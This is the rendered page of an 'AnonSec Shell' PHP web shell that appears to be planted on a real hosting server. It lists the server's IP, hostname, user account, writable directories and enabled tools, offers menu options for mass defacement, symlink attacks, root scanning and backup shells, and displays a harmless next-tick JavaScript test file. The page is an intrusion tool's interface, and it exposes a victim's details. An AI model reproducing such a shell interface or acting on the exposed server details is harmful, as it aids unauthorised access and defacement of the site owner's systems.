AnonSec Shell
Server IP : 162.213.251.212  /  Your IP : 3.142.131.8   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : allssztx ( 535)
PHP Version : 8.1.31
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/allssztx/www/easybuyer/node_modules/next-tick/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/allssztx/www/easybuyer/node_modules/next-tick/test/index.js
'use strict';

module.exports = function (t, a, d) {
	var invoked;

	a(t(function () {
		a(arguments.length, 0, "Arguments");
		invoked = true;
	}), undefined, "Return");
	a(invoked, undefined, "Is not run immediately");
	setTimeout(function () {
		a(invoked, true, "Run in next tick");
		invoked = [];
		t(function () { invoked.push(0); });
		t(function () { invoked.push(1); });
		t(function () { invoked.push(2); });
		setTimeout(function () {
			a.deep(invoked, [0, 1, 2], "Serial");
			d();
		}, 10);
	}, 10);
};

Anon7 - 2022
AnonSec Team